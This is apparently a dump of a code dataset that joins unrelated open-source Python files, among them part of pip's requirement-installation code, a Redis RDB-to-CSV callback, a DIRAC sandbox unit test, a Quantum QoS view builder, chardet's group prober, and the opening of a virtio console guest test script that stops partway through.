shutil.move(old_location, new_location)
self._temp_build_dir.path = new_location
self._ideal_build_dir = None
self.source_dir = os.path.normpath(os.path.abspath(new_location))
self._egg_info_path = None
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if self.source_dir and os.path.exists(
os.path.join(self.source_dir, PIP_DELETE_MARKER_FILENAME)):
logger.debug('Removing source in %s', self.source_dir)
rmtree(self.source_dir)
self.source_dir = None
self._temp_build_dir.cleanup()
self.build_env.cleanup()
def check_if_exists(self, use_user_site):
"""Find an installed distribution that satisfies or conflicts
with this requirement, and set self.satisfied_by or
self.conflicts_with appropriately.
"""
if self.req is None:
return False
try:
# get_distribution() will resolve the entire list of requirements
# anyway, and we've already determined that we need the requirement
# in question, so strip the marker so that we don't try to
# evaluate it.
no_marker = Requirement(str(self.req))
no_marker.marker = None
self.satisfied_by = pkg_resources.get_distribution(str(no_marker))
if self.editable and self.satisfied_by:
self.conflicts_with = self.satisfied_by
# when installing editables, nothing pre-existing should ever
# satisfy
self.satisfied_by = None
return True
except pkg_resources.DistributionNotFound:
return False
except pkg_resources.VersionConflict:
existing_dist = pkg_resources.get_distribution(
self.req.name
)
if use_user_site:
if dist_in_usersite(existing_dist):
self.conflicts_with = existing_dist
elif (running_under_virtualenv() and
dist_in_site_packages(existing_dist)):
raise InstallationError(
"Will not install to the user site because it will "
"lack sys.path precedence to %s in %s" %
(existing_dist.project_name, existing_dist.location)
)
else:
self.conflicts_with = existing_dist
return True
# Things valid for wheels
@property
def is_wheel(self):
return self.link and self.link.is_wheel
def move_wheel_files(self, wheeldir, root=None, home=None, prefix=None,
warn_script_location=True, use_user_site=False,
pycompile=True):
move_wheel_files(
self.name, self.req, wheeldir,
user=use_user_site,
home=home,
root=root,
prefix=prefix,
pycompile=pycompile,
isolated=self.isolated,
warn_script_location=warn_script_location,
)
# Things valid for sdists
@property
def setup_py_dir(self):
return os.path.join(
self.source_dir,
self.link and self.link.subdirectory_fragment or '')
@property
def setup_py(self):
assert self.source_dir, "No source dir for %s" % self
setup_py = os.path.join(self.setup_py_dir, 'setup.py')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
@property
def pyproject_toml(self):
assert self.source_dir, "No source dir for %s" % self
pp_toml = os.path.join(self.setup_py_dir, 'pyproject.toml')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(pp_toml, six.text_type):
pp_toml = pp_toml.encode(sys.getfilesystemencoding())
return pp_toml
def get_pep_518_info(self):
"""Get PEP 518 build-time requirements.
Returns the list of the packages required to build the project,
specified as per PEP 518 within the package. If `pyproject.toml` is not
present, returns None to signify not using the same.
"""
# If pyproject.toml does not exist, don't do anything.
if not os.path.isfile(self.pyproject_toml):
return None
error_template = (
"{package} has a pyproject.toml file that does not comply "
"with PEP 518: {reason}"
)
with io.open(self.pyproject_toml, encoding="utf-8") as f:
pp_toml = pytoml.load(f)
# If there is no build-system table, just use setuptools and wheel.
if "build-system" not in pp_toml:
return ["setuptools", "wheel"]
# Specifying the build-system table but not the requires key is invalid
build_system = pp_toml["build-system"]
if "requires" not in build_system:
raise InstallationError(
error_template.format(package=self, reason=(
"it has a 'build-system' table but not "
"'build-system.requires' which is mandatory in the table"
))
)
# Error out if it's not a list of strings
requires = build_system["requires"]
if not _is_list_of_str(requires):
raise InstallationError(error_template.format(
package=self,
reason="'build-system.requires' is not a list of strings.",
))
return requires
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.debug(
'Running setup.py (path:%s) egg_info for package %s',
self.setup_py, self.name,
)
else:
logger.debug(
'Running setup.py (path:%s) egg_info for package from %s',
self.setup_py, self.link,
)
with indent_log():
script = SETUPTOOLS_SHIM % self.setup_py
base_cmd = [sys.executable, '-c', script]
if self.isolated:
base_cmd += ["--no-user-cfg"]
egg_info_cmd = base_cmd + ['egg_info']
# We can't put the .egg-info files at the root, because then the
# source code will be mistaken for an installed egg, causing
# problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.setup_py_dir, 'pip-egg-info')
ensure_dir(egg_info_dir)
egg_base_option = ['--egg-base', 'pip-egg-info']
with self.build_env:
call_subprocess(
egg_info_cmd + egg_base_option,
cwd=self.setup_py_dir,
show_stdout=False,
command_desc='python setup.py egg_info')
if not self.req:
if isinstance(parse_version(self.pkg_info()["Version"]), Version):
op = "=="
else:
op = "==="
self.req = Requirement(
"".join([
self.pkg_info()["Name"],
op,
self.pkg_info()["Version"],
])
)
self._correct_build_location()
else:
metadata_name = canonicalize_name(self.pkg_info()["Name"])
if canonicalize_name(self.req.name) != metadata_name:
logger.warning(
'Running setup.py (path:%s) egg_info for package %s '
'produced metadata for project name %s. Fix your '
'#egg=%s fragments.',
self.setup_py, self.name, metadata_name, self.name
)
self.req = Requirement(metadata_name)
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.setup_py_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.lexists(
os.path.join(root, dir, 'bin', 'python')
) or
os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
"Files/directories (from %s) not found in %s"
% (filename, base)
)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep) +
(os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warning(
'No PKG-INFO file found in %s',
display_path(self.egg_info_path('PKG-INFO')),
)
p.feed(data or '')
return p.close()
_requirements_section_re = re.compile(r'\[(.*?)\]')
def get_dist(self):
"""Return a pkg_resources.Distribution built from self.egg_info_path"""
egg_info = self.egg_info_path('').rstrip(os.path.sep)
base_dir = os.path.dirname(egg_info)
metadata = pkg_resources.PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
return pkg_resources.Distribution(
os.path.dirname(egg_info),
project_name=dist_name,
metadata=metadata,
)
def assert_source_matches_version(self):
assert self.source_dir
version = self.pkg_info()['version']
if self.req.specifier and version not in self.req.specifier:
logger.warning(
'Requested %s, but installing version %s',
self,
version,
)
else:
logger.debug(
'Source in %s has version %s, which satisfies requirement %s',
display_path(self.source_dir),
version,
self,
)
# For both source distributions and editables
def ensure_has_source_dir(self, parent_dir):
"""Ensure that a source_dir is set.
This will create a temporary build dir if the name of the requirement
isn't known yet.
:param parent_dir: The ideal pip parent_dir for the source_dir.
Generally src_dir for editables and build_dir for sdists.
:return: self.source_dir
"""
if self.source_dir is None:
self.source_dir = self.build_location(parent_dir)
return self.source_dir
# For editable installations
def install_editable(self, install_options,
global_options=(), prefix=None):
logger.info('Running setup.py develop for %s', self.name)
if self.isolated:
global_options = list(global_options) + ["--no-user-cfg"]
if prefix:
prefix_param = ['--prefix={}'.format(prefix)]
install_options = list(install_options) + prefix_param
with indent_log():
# FIXME: should we do --install-headers here too?
with self.build_env:
call_subprocess(
[
sys.executable,
'-c',
SETUPTOOLS_SHIM % self.setup_py
] +
list(global_options) +
['develop', '--no-deps'] +
list(install_options),
cwd=self.setup_py_dir,
show_stdout=False,
)
self.install_succeeded = True
def update_editable(self, obtain=True):
if not self.link:
logger.debug(
"Cannot update repository at %s; repository location is "
"unknown",
self.source_dir,
)
return
assert self.editable
assert self.source_dir
if self.link.scheme == 'file':
# Static paths don't get updated
return
assert '+' in self.link.url, "bad url: %r" % self.link.url
if not self.update:
return
vc_type, url = self.link.url.split('+', 1)
backend = vcs.get_backend(vc_type)
if backend:
vcs_backend = backend(self.link.url)
if obtain:
vcs_backend.obtain(self.source_dir)
else:
vcs_backend.export(self.source_dir)
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.link, vc_type))
# Top-level Actions
def uninstall(self, auto_confirm=False, verbose=False,
use_user_site=False):
"""
Uninstall the distribution currently satisfying this requirement.
Prompts before removing or modifying files unless
``auto_confirm`` is True.
Refuses to delete or modify files outside of ``sys.prefix`` -
thus uninstallation within a virtual environment can only
modify that virtual environment, even if the virtualenv is
linked to global site-packages.
"""
if not self.check_if_exists(use_user_site):
logger.warning("Skipping %s as it is not installed.", self.name)
return
dist = self.satisfied_by or self.conflicts_with
uninstalled_pathset = UninstallPathSet.from_dist(dist)
uninstalled_pathset.remove(auto_confirm, verbose)
return uninstalled_pathset
def _clean_zip_name(self, name, prefix): # only used by archive.
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
# TODO: Investigate if this should be kept in InstallRequirement
# Seems to be used only when VCS + downloads
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.pkg_info()["version"])
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup, (a)bort ' %
display_path(archive_path), ('i', 'w', 'b', 'a'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warning('Deleting %s', display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warning(
'Backing up %s to %s',
display_path(archive_path),
display_path(dest_file),
)
shutil.move(archive_path, dest_file)
elif response == 'a':
sys.exit(-1)
if create_archive:
zip = zipfile.ZipFile(
archive_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True
)
dir = os.path.normcase(os.path.abspath(self.setup_py_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.info('Saved %s', display_path(archive_path))
def install(self, install_options, global_options=None, root=None,
home=None, prefix=None, warn_script_location=True,
use_user_site=False, pycompile=True):
global_options = global_options if global_options is not None else []
if self.editable:
self.install_editable(
install_options, global_options, prefix=prefix,
)
return
if self.is_wheel:
version = wheel.wheel_version(self.source_dir)
wheel.check_compatibility(version, self.name)
self.move_wheel_files(
self.source_dir, root=root, prefix=prefix, home=home,
warn_script_location=warn_script_location,
use_user_site=use_user_site, pycompile=pycompile,
)
self.install_succeeded = True
return
# Extend the list of global and install options passed on to
# the setup.py call with the ones from the requirements file.
# Options specified in requirements file override those
# specified on the command line, since the last option given
# to setup.py is the one that is used.
global_options = list(global_options) + \
self.options.get('global_options', [])
install_options = list(install_options) + \
self.options.get('install_options', [])
if self.isolated:
global_options = global_options + ["--no-user-cfg"]
with TempDirectory(kind="record") as temp_dir:
record_filename = os.path.join(temp_dir.path, 'install-record.txt')
install_args = self.get_install_args(
global_options, record_filename, root, prefix, pycompile,
)
msg = 'Running setup.py install for %s' % (self.name,)
with open_spinner(msg) as spinner:
with indent_log():
with self.build_env:
call_subprocess(
install_args + install_options,
cwd=self.setup_py_dir,
show_stdout=False,
spinner=spinner,
)
if not os.path.exists(record_filename):
logger.debug('Record file %s not found', record_filename)
return
self.install_succeeded = True
def prepend_root(path):
if root is None or not os.path.isabs(path):
return path
else:
return change_root(root, path)
with open(record_filename) as f:
for line in f:
directory = os.path.dirname(line)
if directory.endswith('.egg-info'):
egg_info_dir = prepend_root(directory)
break
else:
logger.warning(
'Could not find .egg-info directory in install record'
' for %s',
self,
)
# FIXME: put the record somewhere
# FIXME: should this be an error?
return
new_lines = []
with open(record_filename) as f:
for line in f:
filename = line.strip()
if os.path.isdir(filename):
filename += os.path.sep
new_lines.append(
os.path.relpath(prepend_root(filename), egg_info_dir)
)
new_lines.sort()
ensure_dir(egg_info_dir)
inst_files_path = os.path.join(egg_info_dir, 'installed-files.txt')
with open(inst_files_path, 'w') as f:
f.write('\n'.join(new_lines) + '\n')
def get_install_args(self, global_options, record_filename, root, prefix,
pycompile):
install_args = [sys.executable, "-u"]
install_args.append('-c')
install_args.append(SETUPTOOLS_SHIM % self.setup_py)
install_args += list(global_options) + \
['install', '--record', record_filename]
install_args += ['--single-version-externally-managed']
if root is not None:
install_args += ['--root', root]
if prefix is not None:
install_args += ['--prefix', prefix]
if pycompile:
install_args += ["--compile"]
else:
install_args += ["--no-compile"]
if running_under_virtualenv():
py_ver_str = 'python' + sysconfig.get_python_version()
install_args += ['--install-headers',
os.path.join(sys.prefix, 'include', 'site',
py_ver_str, self.name)]
return install_args
def parse_editable(editable_req):
"""Parses an editable requirement into:
- a requirement name
- an URL
- extras
- editable options
Accepted requirements:
svn+http://blahblah@rev#egg=Foobar[baz]&subdirectory=version_subdir
.[some_extra]
"""
from pip._internal.index import Link
url = editable_req
# If a file path is specified with extras, strip off the extras.
url_no_extras, extras = _strip_extras(url)
if os.path.isdir(url_no_extras):
if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not found." %
url_no_extras
)
# Treating it as code that has already been checked out
url_no_extras = path_to_url(url_no_extras)
if url_no_extras.lower().startswith('file:'):
package_name = Link(url_no_extras).egg_fragment
if extras:
return (
package_name,
url_no_extras,
Requirement("placeholder" + extras.lower()).extras,
)
else:
return package_name, url_no_extras, None
for version_control in vcs:
if url.lower().startswith('%s:' % version_control):
url = '%s+%s' % (version_control, url)
break
if '+' not in url:
raise InstallationError(
'%s should either be a path to a local project or a VCS url '
'beginning with svn+, git+, hg+, or bzr+' %
editable_req
)
vc_type = url.split('+', 1)[0].lower()
if not vcs.get_backend(vc_type):
error_message = 'For --editable=%s only ' % editable_req + \
', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
' is currently supported'
raise InstallationError(error_message)
package_name = Link(url).egg_fragment
if not package_name:
raise InstallationError(
"Could not detect requirement name for '%s', please specify one "
"with #egg=your_package_name" % editable_req
)
return package_name, url, None
def deduce_helpful_msg(req):
"""Returns helpful msg in case requirements file does not exist,
or cannot be parsed.
:params req: Requirements file path
"""
msg = ""
if os.path.exists(req):
msg = " It does exist."
# Try to parse and check if it is a requirements file.
try:
with open(req, 'r') as fp:
# parse first line only
next(parse_requirements(fp.read()))
msg += " The argument you provided " + \
"(%s) appears to be a" % (req) + \
" requirements file. If that is the" + \
" case, use the '-r' flag to install" + \
" the packages specified within it."
except RequirementParseError:
logger.debug("Cannot parse '%s' as requirements \
file" % (req), exc_info=1)
else:
msg += " File '%s' does not exist." % (req)
return msg
def _is_list_of_str(obj):
return (
isinstance(obj, list) and
all(isinstance(item, six.string_types) for item in obj)
)
| apache-2.0 |
meou/rdb2csv | rdb2csv/csv_callback.py | 1 | 2955 | #!/usr/bin/env python
import sys
from rdbtools import RdbCallback
class CsvCallback(RdbCallback):
def __init__(self, outf, pre, post, column_delimiter = ',', line_delimiter = '\n'):
self.outf = outf
self.column_delimiter = column_delimiter
self.line_delimiter = line_delimiter
self.pre_keys = tuple(pre)
self.post_keys = tuple(post)
self.pre_values = {}
self.post_values = {}
def set(self, key, value, expiry, info):
self.outf.write ("%s%s%s%s" % (str(key), self.column_delimiter, str(value), self.line_delimiter))
def start_hash(self, key, length, expiry, info):
s_key = str(key)
self.pre_values[s_key] = {}
self.post_values[s_key] = {}
def hset(self, key, field, value):
s_key = str(key)
s_field = str(field)
s_value = str(value)
if s_field in self.pre_keys:
self.pre_values[s_key][s_field] = s_value
# print (self.post_values)
elif s_field in self.post_keys:
self.post_values[s_key][s_field] = s_value
# print (self.post_values)
else:
print ("Ignore [key,field,value]=[%s, %s, %s]\n" % (s_key, s_field, s_value))
def end_hash(self, key):
s_key = str(key)
out_list = []
for pre_key in self.pre_keys:
if pre_key in self.pre_values[s_key]:
out_list.append(self.pre_values[s_key][pre_key])
out_list.append(self.column_delimiter)
out_list.append(key)
out_list.append(self.column_delimiter)
for post_key in self.post_keys:
if post_key in self.post_values[s_key]:
out_list.append(self.post_values[s_key][post_key])
out_list.append(self.column_delimiter)
out_list.pop()
out_list.append(self.line_delimiter)
self.outf.write("".join(out_list))
del self.pre_values[s_key]
del self.post_values[s_key]
def start_set(self, key, cardinality, expiry, info):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def sadd(self, key, member):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def end_set(self, key):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def start_list(self, key, length, expiry, info):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def rpush(self, key, value):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def end_list(self, key):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def start_sorted_set(self, key, length, expiry, info):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def zadd(self, key, score, member):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
    def end_sorted_set(self, key):
        self.outf.write(sys._getframe().f_code.co_name + " is not supported yet\n")
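# A minimal usage sketch (not part of the original module): feed the callback
# to rdbtools' RdbParser so every hash in an RDB dump becomes one CSV row,
# with the fields listed in `pre` placed before the key column and the fields
# in `post` after it.  File names and field names below are illustrative.
if __name__ == '__main__':
    from rdbtools import RdbParser
    with open('dump.csv', 'w') as out:
        callback = CsvCallback(out, pre=['id'], post=['score', 'updated_at'])
        parser = RdbParser(callback)
        parser.parse('dump.rdb')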
| mit |
avedaee/DIRAC | WorkloadManagementSystem/DB/test/TestSandboxDB.py | 1 | 1326 | import unittest,zlib
from DIRAC.WorkloadManagementSystem.DB.SandboxDB import SandboxDB
class JobDBTestCase(unittest.TestCase):
""" Base class for the SandboxDB test cases
"""
def setUp(self):
print
self.sDB = SandboxDB('Test',20)
class SandboxCase(JobDBTestCase):
""" TestJobDB represents a test suite for the JobDB database front-end
"""
def test_uploadFile(self):
sandbox = 'out'
#testfile = open('test.jdl','r')
testfile = open('/home/atsareg/distributive/skype-1.3.0.53-1mdk.i586.rpm','r')
body = testfile.read()
#body = zlib.compress(body)
testfile.close()
result = self.sDB.storeSandboxFile(1,sandbox+'putFile1',body,sandbox)
print result
self.assert_( result['OK'])
result = self.sDB.getSandboxFile(1,sandbox+'putFile1',sandbox)
self.assert_( result['OK'])
newbody = result['Value']
self.assertEqual(body,newbody)
result = self.sDB.getFileNames(1,sandbox)
self.assert_( result['OK'])
print result
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(SandboxCase)
# suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(JobRemovalCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
| gpl-3.0 |
aristanetworks/arista-ovs-quantum | quantum/extensions/_qos_view.py | 12 | 1772 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ying Liu, Cisco Systems, Inc.
#
def get_view_builder(req):
"""get view builder"""
base_url = req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
"""
ViewBuilder for QoS,
derived from quantum.views.networks
"""
def __init__(self, base_url):
"""
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build(self, qos_data, is_detail=False):
"""Generic method used to generate a QoS entity."""
if is_detail:
qos = self._build_detail(qos_data)
else:
qos = self._build_simple(qos_data)
return qos
def _build_simple(self, qos_data):
"""Return a simple description of qos."""
return dict(qos=dict(id=qos_data['qos_id']))
def _build_detail(self, qos_data):
"""Return a detailed description of qos."""
return dict(qos=dict(id=qos_data['qos_id'],
name=qos_data['qos_name'],
description=qos_data['qos_desc']))
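# Illustrative results of the builders above (field values are hypothetical):
#   build({'qos_id': '1', 'qos_name': 'gold', 'qos_desc': 'low latency'}, False)
#     => {'qos': {'id': '1'}}
#   build({'qos_id': '1', 'qos_name': 'gold', 'qos_desc': 'low latency'}, True)
#     => {'qos': {'id': '1', 'name': 'gold', 'description': 'low latency'}}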
| apache-2.0 |
mmazanec22/too-windy | env/lib/python3.5/site-packages/requests/packages/chardet/charsetgroupprober.py | 2929 | 3791 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
import sys
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mActiveNum = 0
self._mProbers = []
self._mBestGuessProber = None
def reset(self):
CharSetProber.reset(self)
self._mActiveNum = 0
for prober in self._mProbers:
if prober:
prober.reset()
prober.active = True
self._mActiveNum += 1
self._mBestGuessProber = None
def get_charset_name(self):
if not self._mBestGuessProber:
self.get_confidence()
if not self._mBestGuessProber:
return None
# self._mBestGuessProber = self._mProbers[0]
return self._mBestGuessProber.get_charset_name()
def feed(self, aBuf):
for prober in self._mProbers:
if not prober:
continue
if not prober.active:
continue
st = prober.feed(aBuf)
if not st:
continue
if st == constants.eFoundIt:
self._mBestGuessProber = prober
return self.get_state()
elif st == constants.eNotMe:
prober.active = False
self._mActiveNum -= 1
if self._mActiveNum <= 0:
self._mState = constants.eNotMe
return self.get_state()
return self.get_state()
def get_confidence(self):
st = self.get_state()
if st == constants.eFoundIt:
return 0.99
elif st == constants.eNotMe:
return 0.01
bestConf = 0.0
self._mBestGuessProber = None
for prober in self._mProbers:
if not prober:
continue
if not prober.active:
if constants._debug:
sys.stderr.write(prober.get_charset_name()
+ ' not active\n')
continue
cf = prober.get_confidence()
if constants._debug:
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(), cf))
if bestConf < cf:
bestConf = cf
self._mBestGuessProber = prober
if not self._mBestGuessProber:
return 0.0
return bestConf
# else:
# self._mBestGuessProber = self._mProbers[0]
# return self._mBestGuessProber.get_confidence()
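# Sketch of how this class is meant to be used (the concrete prober names are
# placeholders, not real classes from this library): a subclass populates
# self._mProbers in its __init__ and inherits feed()/get_confidence() above.
#
#   class MyGroupProber(CharSetGroupProber):
#       def __init__(self):
#           CharSetGroupProber.__init__(self)
#           self._mProbers = [SomeSingleByteProber(), AnotherProber()]
#           self.reset()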
| gpl-3.0 |
xutian/virt-test | shared/scripts/virtio_console_guest.py | 9 | 50746 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Auxiliary script used to send data between ports on guests.
:copyright: 2010 Red Hat, Inc.
:author: Jiri Zupka ([email protected])
:author: Lukas Doktor ([email protected])
"""
import threading
from threading import Thread
import os
import select
import re
import random
import sys
import array
import stat
import traceback
import signal
import time
if os.name == "posix": # Linux
os_linux = True
import fcntl
else: # Windows
os_linux = False
try:
import win32file
except ImportError, failure_detail:
print "Import failed. Do you have ctypes and pywin32 installed?"
raise failure_detail
DEBUGPATH = "/sys/kernel/debug"
SYSFSPATH = "/sys/class/virtio-ports/"
DEVPATH = "/dev/virtio-ports/"
exiting = False
virt = None
class VirtioGuest:
"""
Test tools of virtio_ports.
"""
LOOP_NONE = 0
LOOP_POLL = 1
LOOP_SELECT = 2
LOOP_RECONNECT_NONE = 3
def __init__(self):
self.files = {}
self.exit_thread = threading.Event()
self.threads = []
self.ports = {}
self.poll_fds = {}
self.catch_signal = None
self.use_config = threading.Event()
def init(self, in_files):
"""
Init and check port properties.
"""
raise NotImplementedError
def _open(self, in_files):
"""
Open devices and return array of descriptors
:param in_files: Files array
:return: Array of descriptor
"""
raise NotImplementedError
def check_zero_sym(self):
"""
        Check if the first port's symlink was created.
"""
raise NotImplementedError
def poll(self, port, expected, timeout=500):
"""
        Checks the port POLL status and verifies it against the expected results.
:param port: Port name.
:param expected: Expected POLL status (mask)
"""
raise NotImplementedError
def lseek(self, port, pos, how):
"""
Use lseek on the device. The device is unseekable so PASS is returned
when lseek command fails and vice versa.
:param port: Name of the port
:param pos: Offset
:param how: Relative offset os.SEEK_{SET,CUR,END}
"""
raise NotImplementedError
def blocking(self, port, mode=False):
"""
Set port function mode blocking/nonblocking
:param port: port to set mode
:param mode: False to set nonblock mode, True for block mode
"""
raise NotImplementedError
def async(self, port, mode=True, exp_val=0):
"""
Set port function mode async/sync.
        :param port: port which should be polled.
        :param mode: False to set sync mode, True for async mode.
        :param exp_val: Value which should be polled.
"""
raise NotImplementedError
def close(self, port_file):
"""
Close open port.
:param port_file: File to close.
"""
raise NotImplementedError
def open(self, in_file):
"""
Direct open devices.
:param in_file: Array of files.
:return: Array of descriptors.
"""
raise NotImplementedError
def loopback(self, in_files, out_files, cachesize=1024,
mode=0):
"""
Start a switch thread.
(There is a problem with multiple opens of a single file).
:param in_files: Array of input files.
:param out_files: Array of output files.
:param cachesize: Cachesize.
:param mode: Mode of switch.
"""
in_f = self._open(in_files)
out_f = self._open(out_files)
s = self.Switch(in_f, out_f, self.exit_thread, cachesize, mode)
s.start()
self.threads.append(s)
print "PASS: Start switch"
def exit_threads(self):
"""
Function end all running data switch.
"""
raise NotImplementedError
def send_loop_init(self, port, length):
"""
Prepares the sender thread. Requires clean thread structure.
        :param port: On which port to send data
:param length: length of data
"""
raise NotImplementedError
def send_loop(self):
"""
Start sender data transfer. Requires senderprepare run first.
"""
raise NotImplementedError
def send(self, port, length=1, mode=True, is_static=False):
"""
        Send data of arbitrary length
:param port: Port to write data
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
:param is_static: False = generates $length long block (mode=0)
True = generates 4096 long block (faster, mode=1)
"""
raise NotImplementedError
def recv(self, port, length=1, bfr=1024, mode=True):
"""
        Receive data of arbitrary length.
        :param port: Port to read data from
:param length: Length of data
:param mode: True = loop mode, False = one shoot mode
"""
raise NotImplementedError
def clean_port(self, port, bfr=1024):
raise NotImplementedError
class VirtioGuestPosix(VirtioGuest):
"""
Test tools of virtio_ports.
"""
def _readfile(self, name):
"""
Read file and return content as string
:param name: Name of file
:return: Content of file as string
"""
out = ""
try:
f = open(name, "r")
out = f.read()
f.close()
except Exception:
print "FAIL: Cannot open file %s" % (name)
return out
def _get_port_status(self, in_files=None):
"""
Get info about ports from kernel debugfs.
:param in_files: Array of input files.
:return: Ports dictionary of port properties
"""
ports = {}
not_present_msg = "FAIL: There's no virtio-ports dir in debugfs"
if not os.path.ismount(DEBUGPATH):
os.system('mount -t debugfs none %s' % (DEBUGPATH))
try:
if not os.path.isdir('%s/virtio-ports' % (DEBUGPATH)):
print not_present_msg
except Exception:
print not_present_msg
else:
viop_names = os.listdir('%s/virtio-ports' % (DEBUGPATH))
if in_files is not None:
dev_names = os.listdir('/dev')
rep = re.compile(r"vport[0-9]p[0-9]+")
dev_names = filter(
lambda x: rep.match(x) is not None, dev_names)
if len(dev_names) != len(in_files):
print ("FAIL: Not all ports were successfully initialized "
"in /dev, only %d from %d." % (len(dev_names),
len(in_files)))
return
if len(viop_names) != len(in_files):
print ("FAIL: Not all ports were successfully initialized "
"in debugfs, only %d from %d." % (len(viop_names),
len(in_files)))
return
for name in viop_names:
open_db_file = "%s/virtio-ports/%s" % (DEBUGPATH, name)
f = open(open_db_file, 'r')
port = {}
line_list = []
for line in iter(f):
line_list.append(line)
try:
for line in line_list:
m = re.match("(\S+): (\S+)", line)
port[m.group(1)] = m.group(2)
if port['is_console'] == "yes":
port["path"] = "/dev/hvc%s" % (port["console_vtermno"])
# Console works like a serialport
else:
port["path"] = "/dev/%s" % name
if not os.path.exists(port['path']):
print "FAIL: %s not exist" % port['path']
sysfspath = SYSFSPATH + name
if not os.path.isdir(sysfspath):
print "FAIL: %s not exist" % (sysfspath)
